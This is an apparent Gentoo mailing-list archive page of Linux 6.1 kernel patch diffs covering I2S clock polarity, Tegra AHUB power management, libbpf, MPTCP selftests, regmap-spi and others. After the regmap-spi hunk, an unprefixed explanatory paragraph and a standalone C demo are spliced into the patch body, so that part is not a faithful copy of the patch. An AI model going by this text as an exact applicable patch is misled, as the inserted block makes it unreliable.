+-	 * scope it's clear that the LRCK polarity is reversed
+-	 * compared to the expected polarity on the bus.
+-	 */
+-	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
+-	case SND_SOC_DAIFMT_IB_IF:
+-		/* Invert both clocks */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_IB_NF:
+-		/* Invert bit clock */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED |
+-		      SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_NB_IF:
+-		/* Invert frame clock */
+-		val = 0;
+-		break;
+-	case SND_SOC_DAIFMT_NB_NF:
+-		val = SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
+-			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
+-			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
+-			   val);
+-
+ 	/* DAI Mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_DSP_A:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_DSP_B:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_I2S:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_LOW;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_LEFT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_RIGHT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_RIGHT;
+ 		offset = 0;
+ 		break;
+@@ -803,6 +775,35 @@ static int sun8i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 			   SUN8I_I2S_TX_CHAN_OFFSET_MASK,
+ 			   SUN8I_I2S_TX_CHAN_OFFSET(offset));
+ 
++	/* DAI clock polarity */
++	bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_NORMAL;
++
++	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
++	case SND_SOC_DAIFMT_IB_IF:
++		/* Invert both clocks */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_IB_NF:
++		/* Invert bit clock */
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_NB_IF:
++		/* Invert frame clock */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		break;
++	case SND_SOC_DAIFMT_NB_NF:
++		/* No inversion */
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
++			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
++			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
++			   lrclk_pol | bclk_pol);
++
+ 	/* DAI clock master masks */
+ 	switch (fmt & SND_SOC_DAIFMT_CLOCK_PROVIDER_MASK) {
+ 	case SND_SOC_DAIFMT_BP_FP:
+@@ -834,65 +835,37 @@ static int sun8i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ static int sun50i_h6_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 				     unsigned int fmt)
+ {
+-	u32 mode, val;
++	u32 mode, lrclk_pol, bclk_pol, val;
+ 	u8 offset;
+ 
+-	/*
+-	 * DAI clock polarity
+-	 *
+-	 * The setup for LRCK contradicts the datasheet, but under a
+-	 * scope it's clear that the LRCK polarity is reversed
+-	 * compared to the expected polarity on the bus.
+-	 */
+-	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
+-	case SND_SOC_DAIFMT_IB_IF:
+-		/* Invert both clocks */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_IB_NF:
+-		/* Invert bit clock */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED |
+-		      SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_NB_IF:
+-		/* Invert frame clock */
+-		val = 0;
+-		break;
+-	case SND_SOC_DAIFMT_NB_NF:
+-		val = SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
+-			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
+-			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
+-			   val);
+-
+ 	/* DAI Mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_DSP_A:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_DSP_B:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_I2S:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_LOW;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_LEFT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_RIGHT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_RIGHT;
+ 		offset = 0;
+ 		break;
+@@ -910,6 +883,36 @@ static int sun50i_h6_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 			   SUN50I_H6_I2S_TX_CHAN_SEL_OFFSET_MASK,
+ 			   SUN50I_H6_I2S_TX_CHAN_SEL_OFFSET(offset));
+ 
++	/* DAI clock polarity */
++	bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_NORMAL;
++
++	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
++	case SND_SOC_DAIFMT_IB_IF:
++		/* Invert both clocks */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_IB_NF:
++		/* Invert bit clock */
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_NB_IF:
++		/* Invert frame clock */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		break;
++	case SND_SOC_DAIFMT_NB_NF:
++		/* No inversion */
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
++			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
++			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
++			   lrclk_pol | bclk_pol);
++
++
+ 	/* DAI clock master masks */
+ 	switch (fmt & SND_SOC_DAIFMT_CLOCK_PROVIDER_MASK) {
+ 	case SND_SOC_DAIFMT_BP_FP:
+diff --git a/sound/soc/tegra/tegra210_ahub.c b/sound/soc/tegra/tegra210_ahub.c
+index b38d205b69cc2..dfdcb4580cd75 100644
+--- a/sound/soc/tegra/tegra210_ahub.c
++++ b/sound/soc/tegra/tegra210_ahub.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_ahub.c - Tegra210 AHUB driver
+ //
+-// Copyright (c) 2020-2022, NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2020-2024, NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -1401,11 +1401,13 @@ static int tegra_ahub_probe(struct platform_device *pdev)
+ 		return err;
+ 	}
+ 
++	pm_runtime_enable(&pdev->dev);
++
+ 	err = of_platform_populate(pdev->dev.of_node, NULL, NULL, &pdev->dev);
+-	if (err)
++	if (err) {
++		pm_runtime_disable(&pdev->dev);
+ 		return err;
+-
+-	pm_runtime_enable(&pdev->dev);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index bb27dfd6b97a7..878f05a424218 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -9364,7 +9364,7 @@ __bpf_map__iter(const struct bpf_map *m, const struct bpf_object *obj, int i)
+ struct bpf_map *
+ bpf_object__next_map(const struct bpf_object *obj, const struct bpf_map *prev)
+ {
+-	if (prev == NULL)
++	if (prev == NULL && obj != NULL)
+ 		return obj->maps;
+ 
+ 	return __bpf_map__iter(prev, obj, 1);
+@@ -9373,7 +9373,7 @@ bpf_object__next_map(const struct bpf_object *obj, const struct bpf_map *prev)
+ struct bpf_map *
+ bpf_object__prev_map(const struct bpf_object *obj, const struct bpf_map *next)
+ {
+-	if (next == NULL) {
++	if (next == NULL && obj != NULL) {
+ 		if (!obj->nr_maps)
+ 			return NULL;
+ 		return obj->maps + obj->nr_maps - 1;
+diff --git a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+index 890a8236a8ba7..2809f9a25c433 100644
+--- a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
++++ b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+@@ -28,9 +28,11 @@ static int check_vgem(int fd)
+ 	version.name = name;
+ 
+ 	ret = ioctl(fd, DRM_IOCTL_VERSION, &version);
+-	if (ret)
++	if (ret || version.name_len != 4)
+ 		return 0;
+ 
++	name[4] = '\0';
++
+ 	return !strcmp(name, "vgem");
+ }
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 33c002c26604d..446b8daa23e07 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -394,6 +394,25 @@ reset_with_fail()
+ 	fi
+ }
+ 
++start_events()
++{
++	evts_ns1=$(mktemp)
++	evts_ns2=$(mktemp)
++	:> "$evts_ns1"
++	:> "$evts_ns2"
++	ip netns exec "${ns1}" ./pm_nl_ctl events >> "$evts_ns1" 2>&1 &
++	evts_ns1_pid=$!
++	ip netns exec "${ns2}" ./pm_nl_ctl events >> "$evts_ns2" 2>&1 &
++	evts_ns2_pid=$!
++}
++
++reset_with_events()
++{
++	reset "${1}" || return 1
++
++	start_events
++}
++
+ reset_with_tcp_filter()
+ {
+ 	reset "${1}" || return 1
+@@ -596,6 +615,14 @@ kill_tests_wait()
+ 	wait
+ }
+ 
++kill_events_pids()
++{
++	kill_wait $evts_ns1_pid
++	evts_ns1_pid=0
++	kill_wait $evts_ns2_pid
++	evts_ns2_pid=0
++}
++
+ pm_nl_set_limits()
+ {
+ 	local ns=$1
+@@ -3143,6 +3170,32 @@ fail_tests()
+ 	fi
+ }
+ 
++# $1: ns ; $2: event type ; $3: count
++chk_evt_nr()
++{
++	local ns=${1}
++	local evt_name="${2}"
++	local exp="${3}"
++
++	local evts="${evts_ns1}"
++	local evt="${!evt_name}"
++	local count
++
++	evt_name="${evt_name:16}" # without MPTCP_LIB_EVENT_
++	[ "${ns}" == "ns2" ] && evts="${evts_ns2}"
++
++	printf "%-${nr_blank}s %s" " " "event ${ns} ${evt_name} (${exp})"
++
++	count=$(grep -cw "type:${evt}" "${evts}")
++	if [ "${count}" != "${exp}" ]; then
++		echo "[fail] got $count events, expected $exp"
++		fail_test
++		dump_stats
++	else
++		echo "[ ok ]"
++	fi
++}
++
+ userspace_tests()
+ {
+ 	# userspace pm type prevents add_addr
+@@ -3236,75 +3289,6 @@ userspace_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_rm_nr 0 1
+ 	fi
+-
+-	# remove and re-add
+-	if reset "delete re-add signal" &&
+-	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+-		pm_nl_set_limits $ns1 0 3
+-		pm_nl_set_limits $ns2 3 3
+-		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
+-		# broadcast IP: no packet for this address will be received on ns1
+-		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
+-		pm_nl_add_endpoint $ns1 10.0.1.1 id 42 flags signal
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
+-		local tests_pid=$!
+-
+-		wait_mpj $ns2
+-		chk_subflow_nr needtitle "before delete" 2
+-
+-		pm_nl_del_endpoint $ns1 1 10.0.2.1
+-		pm_nl_del_endpoint $ns1 2 224.0.0.1
+-		sleep 0.5
+-		chk_subflow_nr "" "after delete" 1
+-
+-		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
+-		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
+-		wait_mpj $ns2
+-		chk_subflow_nr "" "after re-add" 3
+-
+-		pm_nl_del_endpoint $ns1 42 10.0.1.1
+-		sleep 0.5
+-		chk_subflow_nr "" "after delete ID 0" 2
+-
+-		pm_nl_add_endpoint $ns1 10.0.1.1 id 99 flags signal
+-		wait_mpj $ns2
+-		chk_subflow_nr "" "after re-add" 3
+-		kill_tests_wait
+-
+-		chk_join_nr 4 4 4
+-		chk_add_nr 5 5
+-		chk_rm_nr 3 2 invert
+-	fi
+-
+-	# flush and re-add
+-	if reset_with_tcp_filter "flush re-add" ns2 10.0.3.2 REJECT OUTPUT &&
+-	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+-		pm_nl_set_limits $ns1 0 2
+-		pm_nl_set_limits $ns2 1 2
+-		# broadcast IP: no packet for this address will be received on ns1
+-		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
+-		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
+-		local tests_pid=$!
+-
+-		wait_attempt_fail $ns2
+-		chk_subflow_nr needtitle "before flush" 1
+-
+-		pm_nl_flush_endpoint $ns2
+-		pm_nl_flush_endpoint $ns1
+-		wait_rm_addr $ns2 0
+-		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
+-		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
+-		wait_mpj $ns2
+-		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
+-		wait_mpj $ns2
+-		kill_wait "${tests_pid}"
+-		kill_tests_wait
+-
+-		chk_join_nr 2 2 2
+-		chk_add_nr 2 2
+-		chk_rm_nr 1 0 invert
+-	fi
+ }
+ 
+ endpoint_tests()
+@@ -3334,11 +3318,13 @@ endpoint_tests()
+ 
+ 	if reset_with_tcp_filter "delete and re-add" ns2 10.0.3.2 REJECT OUTPUT &&
+ 	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		start_events
+ 		pm_nl_set_limits $ns1 0 3
+ 		pm_nl_set_limits $ns2 0 3
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 id 1 dev ns2eth1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_5 2>/dev/null &
++		local tests_pid=$!
+ 
+ 		wait_mpj $ns2
+ 		pm_nl_del_endpoint $ns2 2 10.0.2.2
+@@ -3370,11 +3356,121 @@ endpoint_tests()
+ 			chk_subflow_nr "" "after re-add id 0 ($i)" 3
+ 		done
+ 
++		kill_wait "${tests_pid}"
++		kill_events_pids
+ 		kill_tests_wait
+ 
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ANNOUNCED 0
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_REMOVED 4
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_ESTABLISHED 6
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_CLOSED 4
++
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ANNOUNCED 0
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_REMOVED 0
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_ESTABLISHED 6
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_CLOSED 5 # one has been closed before estab
++
+ 		chk_join_nr 6 6 6
+ 		chk_rm_nr 4 4
+ 	fi
++
++	# remove and re-add
++	if reset_with_events "delete re-add signal" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 3
++		pm_nl_set_limits $ns2 3 3
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 42 flags signal
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_5 2>/dev/null &
++		local tests_pid=$!
++
++		wait_mpj $ns2
++		chk_subflow_nr needtitle "before delete" 2
++
++		pm_nl_del_endpoint $ns1 1 10.0.2.1
++		pm_nl_del_endpoint $ns1 2 224.0.0.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete" 1
++
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add" 3
++
++		pm_nl_del_endpoint $ns1 42 10.0.1.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete ID 0" 2
++
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 99 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add ID 0" 3
++
++		pm_nl_del_endpoint $ns1 99 10.0.1.1
++		sleep 0.5
++		chk_subflow_nr "" "after re-delete ID 0" 2
++
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 88 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-re-add ID 0" 3
++
++		kill_wait "${tests_pid}"
++		kill_events_pids
++		kill_tests_wait
++
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ANNOUNCED 0
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_REMOVED 0
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_ESTABLISHED 5
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_CLOSED 3
++
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ANNOUNCED 6
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_REMOVED 4
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_ESTABLISHED 5
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_CLOSED 3
++
++		chk_join_nr 5 5 5
++		chk_add_nr 6 6
++		chk_rm_nr 4 3 invert
++	fi
++
++	# flush and re-add
++	if reset_with_tcp_filter "flush re-add" ns2 10.0.3.2 REJECT OUTPUT &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 1 2
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		local tests_pid=$!
++
++		wait_attempt_fail $ns2
++		chk_subflow_nr needtitle "before flush" 1
++
++		pm_nl_flush_endpoint $ns2
++		pm_nl_flush_endpoint $ns1
++		wait_rm_addr $ns2 0
++		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_mpj $ns2
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		kill_wait "${tests_pid}"
++		kill_tests_wait
++
++		chk_join_nr 2 2 2
++		chk_add_nr 2 2
++		chk_rm_nr 1 0 invert
++	fi
+ }
+ 
+ # [$1: error message]
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_lib.sh b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+index f32045b23b893..4b1bef34d6d8c 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_lib.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+@@ -4,6 +4,21 @@
+ readonly KSFT_FAIL=1
+ readonly KSFT_SKIP=4
+ 
++# These variables are used in some selftests, read-only
++declare -rx MPTCP_LIB_EVENT_CREATED=1           # MPTCP_EVENT_CREATED
++declare -rx MPTCP_LIB_EVENT_ESTABLISHED=2       # MPTCP_EVENT_ESTABLISHED
++declare -rx MPTCP_LIB_EVENT_CLOSED=3            # MPTCP_EVENT_CLOSED
++declare -rx MPTCP_LIB_EVENT_ANNOUNCED=6         # MPTCP_EVENT_ANNOUNCED
++declare -rx MPTCP_LIB_EVENT_REMOVED=7           # MPTCP_EVENT_REMOVED
++declare -rx MPTCP_LIB_EVENT_SUB_ESTABLISHED=10  # MPTCP_EVENT_SUB_ESTABLISHED
++declare -rx MPTCP_LIB_EVENT_SUB_CLOSED=11       # MPTCP_EVENT_SUB_CLOSED
++declare -rx MPTCP_LIB_EVENT_SUB_PRIORITY=13     # MPTCP_EVENT_SUB_PRIORITY
++declare -rx MPTCP_LIB_EVENT_LISTENER_CREATED=15 # MPTCP_EVENT_LISTENER_CREATED
++declare -rx MPTCP_LIB_EVENT_LISTENER_CLOSED=16  # MPTCP_EVENT_LISTENER_CLOSED
++
++declare -rx MPTCP_LIB_AF_INET=2
++declare -rx MPTCP_LIB_AF_INET6=10
++
+ # SELFTESTS_MPTCP_LIB_EXPECT_ALL_FEATURES env var can be set when validating all
+ # features using the last version of the kernel and the selftests to make sure
+ # a test is not being skipped by mistake.


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-08 11:06 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-08 11:06 UTC (permalink / raw
  To: gentoo-commits

commit:     e5dea1f743963e97a7691f9dda600439eaf3c4ad
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Sep  8 11:06:33 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Sep  8 11:06:33 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e5dea1f7

Linux patch 6.1.109

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1108_linux-6.1.109.patch | 4628 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4632 insertions(+)

diff --git a/0000_README b/0000_README
index 06b1b356..2deab4a3 100644
--- a/0000_README
+++ b/0000_README
@@ -479,6 +479,10 @@ Patch:  1107_linux-6.1.108.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.108
 
+Patch:  1108_linux-6.1.109.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.109
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1108_linux-6.1.109.patch b/1108_linux-6.1.109.patch
new file mode 100644
index 00000000..f282b587
--- /dev/null
+++ b/1108_linux-6.1.109.patch
@@ -0,0 +1,4628 @@
+diff --git a/Documentation/locking/hwspinlock.rst b/Documentation/locking/hwspinlock.rst
+index 6f03713b70039..2ffaa3cbd63f1 100644
+--- a/Documentation/locking/hwspinlock.rst
++++ b/Documentation/locking/hwspinlock.rst
+@@ -85,6 +85,17 @@ is already free).
+ 
+ Should be called from a process context (might sleep).
+ 
++::
++
++  int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id);
++
++After verifying the owner of the hwspinlock, release a previously acquired
++hwspinlock; returns 0 on success, or an appropriate error code on failure
++(e.g. -EOPNOTSUPP if the bust operation is not defined for the specific
++hwspinlock).
++
++Should be called from a process context (might sleep).
++
+ ::
+ 
+   int hwspin_lock_timeout(struct hwspinlock *hwlock, unsigned int timeout);
+diff --git a/Makefile b/Makefile
+index 4813b751ccb0d..59c1ac88c57d9 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 108
++SUBLEVEL = 109
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/block/blk-integrity.c b/block/blk-integrity.c
+index 69eed260a8239..e2d88611d5bf9 100644
+--- a/block/blk-integrity.c
++++ b/block/blk-integrity.c
+@@ -431,8 +431,6 @@ void blk_integrity_unregister(struct gendisk *disk)
+ 	if (!bi->profile)
+ 		return;
+ 
+-	/* ensure all bios are off the integrity workqueue */
+-	blk_flush_integrity();
+ 	blk_queue_flag_clear(QUEUE_FLAG_STABLE_WRITES, disk->queue);
+ 	memset(bi, 0, sizeof(*bi));
+ }
+diff --git a/drivers/base/regmap/regmap-spi.c b/drivers/base/regmap/regmap-spi.c
+index 37ab23a9d0345..7f14c5ed1e229 100644
+--- a/drivers/base/regmap/regmap-spi.c
++++ b/drivers/base/regmap/regmap-spi.c
+@@ -122,8 +122,7 @@ static const struct regmap_bus *regmap_get_spi_bus(struct spi_device *spi,
+ 			return ERR_PTR(-ENOMEM);
+ 
+ 		max_msg_size = spi_max_message_size(spi);
+-		reg_reserve_size = config->reg_bits / BITS_PER_BYTE
+-				 + config->pad_bits / BITS_PER_BYTE;
++		reg_reserve_size = (config->reg_bits + config->pad_bits) / BITS_PER_BYTE;
+ 		if (max_size + reg_reserve_size > max_msg_size)
+ 			max_size -= reg_reserve_size;
+ 
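
The regmap-spi change above replaces two truncating divisions with one:
reg_bits / 8 + pad_bits / 8 under-reserves whenever the individual fields are
not byte multiples but their sum is. A standalone illustration with invented
field widths:

    #include <stdio.h>

    #define BITS_PER_BYTE 8

    int main(void)
    {
            unsigned int reg_bits = 12, pad_bits = 4;

            /* Old: each division truncates -> 1 + 0 = 1 byte reserved */
            unsigned int old_size = reg_bits / BITS_PER_BYTE
                                  + pad_bits / BITS_PER_BYTE;

            /* New: sum first -> 16 / 8 = 2 bytes, the real on-wire size */
            unsigned int new_size = (reg_bits + pad_bits) / BITS_PER_BYTE;

            printf("old=%u new=%u\n", old_size, new_size); /* old=1 new=2 */
            return 0;
    }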
+diff --git a/drivers/cpufreq/scmi-cpufreq.c b/drivers/cpufreq/scmi-cpufreq.c
+index 028df8a5f537a..079940c69ee0b 100644
+--- a/drivers/cpufreq/scmi-cpufreq.c
++++ b/drivers/cpufreq/scmi-cpufreq.c
+@@ -62,9 +62,9 @@ static unsigned int scmi_cpufreq_fast_switch(struct cpufreq_policy *policy,
+ 					     unsigned int target_freq)
+ {
+ 	struct scmi_data *priv = policy->driver_data;
++	unsigned long freq = target_freq;
+ 
+-	if (!perf_ops->freq_set(ph, priv->domain_id,
+-				target_freq * 1000, true))
++	if (!perf_ops->freq_set(ph, priv->domain_id, freq * 1000, true))
+ 		return target_freq;
+ 
+ 	return 0;
+diff --git a/drivers/dma/altera-msgdma.c b/drivers/dma/altera-msgdma.c
+index 4153c2edb0490..711e3756a39a5 100644
+--- a/drivers/dma/altera-msgdma.c
++++ b/drivers/dma/altera-msgdma.c
+@@ -233,7 +233,7 @@ static void msgdma_free_descriptor(struct msgdma_device *mdev,
+ 	struct msgdma_sw_desc *child, *next;
+ 
+ 	mdev->desc_free_cnt++;
+-	list_add_tail(&desc->node, &mdev->free_list);
